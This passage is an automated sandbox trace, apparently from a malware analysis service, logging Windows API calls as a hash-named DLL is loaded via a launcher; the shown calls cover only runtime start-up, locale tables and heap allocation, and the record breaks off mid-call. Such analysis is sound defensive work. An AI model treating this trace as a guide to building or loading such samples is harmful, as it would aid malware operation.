lpStartupInfo=0x14fea0 | out: lpStartupInfo=0x14fea0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0087.152] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeW" [0087.152] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeW", pNumArgs=0x14fe70 | out: pNumArgs=0x14fe70) returned 0x4f9740*="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" [0087.153] LoadLibraryW (lpLibFileName="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll") returned 0x7ffc45e90000 [0087.157] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0087.157] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0087.158] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0087.158] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0087.158] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0087.159] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0087.159] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0087.160] GetProcessHeap () returned 0x4f0000 [0087.160] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0087.160] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0087.160] GetLastError () returned 0x0 [0087.160] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0087.160] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0087.160] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3c8) returned 0x505ae0 [0087.160] SetLastError (dwErrCode=0x0) [0087.160] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1200) returned 0x505eb0 [0087.162] GetStartupInfoW (in: lpStartupInfo=0x14f6f0 | out: lpStartupInfo=0x14f6f0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0087.162] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0087.163] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0087.163] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0087.163] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeW" [0087.163] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=ResumeW" [0087.163] GetACP () returned 0x4e4 [0087.163] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x228) returned 0x4fac70 [0087.163] IsValidCodePage (CodePage=0x4e4) returned 1 [0087.163] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f6b0 | out: lpCPInfo=0x14f6b0) returned 1 [0087.163] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14ef50 | out: lpCPInfo=0x14ef50) returned 1 [0087.163] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0087.163] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14eca0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp") returned 256 [0087.163] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿp", cchSrc=256, lpCharType=0x14f270 | out: lpCharType=0x14f270) returned 1 [0087.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0087.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0087.164] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0087.164] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0087.164] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0087.164] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0087.164] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f070, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ0\x0e\x91_ü\x7f", lpUsedDefaultChar=0x0) returned 256 [0087.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0087.164] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14ef70, cbMultiByte=256, lpWideCharStr=0x14ec40, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0087.164] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0087.164] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14ea30, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0087.164] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f170, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0087.164] RtlInitializeSListHead (in: ListHead=0x7ffc45fcd4a0 | out: ListHead=0x7ffc45fcd4a0) [0087.165] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1000) returned 0x5070c0 [0087.165] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f540, nSize=0x105 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\giumlol.exe")) returned 0x29 [0087.165] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x7ffc5ecd0000 [0087.165] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="AreFileApisANSI") returned 0x7ffc5ecf4820 [0087.165] AreFileApisANSI () returned 1 [0087.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0087.165] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", cchWideChar=-1, lpMultiByteStr=0x7ffc45fcd6c0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", lpUsedDefaultChar=0x0) returned 42 [0087.165] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xc1) returned 0x4f4830 [0087.166] GetEnvironmentStringsW () returned 0x5080d0* [0087.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1254 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x4e6) returned 0x508ab0 [0087.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1254, lpMultiByteStr=0x508ab0, cbMultiByte=1254, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1254 [0087.166] FreeEnvironmentStringsW (penv=0x5080d0) returned 1 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x118) returned 0x4fa9e0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1f) returned 0x4fb260 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2e) returned 0x4f98b0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x31) returned 0x4f4f70 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3c) returned 0x5002e0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x31) returned 0x4f4fb0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x14) returned 0x4f4060 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x24) returned 0x4fb2c0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xd) returned 0x4f9be0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1d) returned 0x4fb530 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x31) returned 0x4f4ff0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x15) returned 0x4f5030 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x17) returned 0x4f25e0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xe) returned 0x4f3e90 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x69) returned 0x4f3eb0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x3e) returned 0x500880 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1d) returned 0x4fb560 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x48) returned 0x500790 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x12) returned 0x4f3f30 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x18) returned 0x4f3f50 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1b) returned 0x4fb590 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1e) returned 0x4fb9b0 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x29) returned 0x508760 [0087.166] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x1e) returned 0x4fb290 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x6b) returned 0x4fb9f0 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x17) returned 0x4fba70 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xf) returned 0x4fba90 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x16) returned 0x4fbab0 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x2a) returned 0x508360 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x29) returned 0x5081e0 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x12) returned 0x508ff0 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x21) returned 0x4fb620 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x16) returned 0x5091b0 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x22) returned 0x4fb800 [0087.167] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x12) returned 0x509350 [0087.167] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x508ab0 | out: hHeap=0x4f0000) returned 1 [0087.168] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa3a7) returned 0x5093b0 [0087.170] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20) returned 0x4fb6b0 [0087.170] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xa3a7) returned 0x513760 [0087.171] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5093b0 | out: hHeap=0x4f0000) returned 1 [0087.171] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xfef7) returned 0x51db10 [0087.173] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x40) returned 0x5000b0 [0087.174] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xfef7) returned 0x52da10 [0087.175] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4fb6b0 | out: hHeap=0x4f0000) returned 1 [0087.175] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51db10 | out: hHeap=0x4f0000) returned 1 [0087.176] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x450) returned 0x5088e0 [0087.176] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x450) returned 0x53d910 [0087.176] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.176] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1ea7) returned 0x53dd70 [0087.176] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xf40) returned 0x5093b0 [0087.177] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, 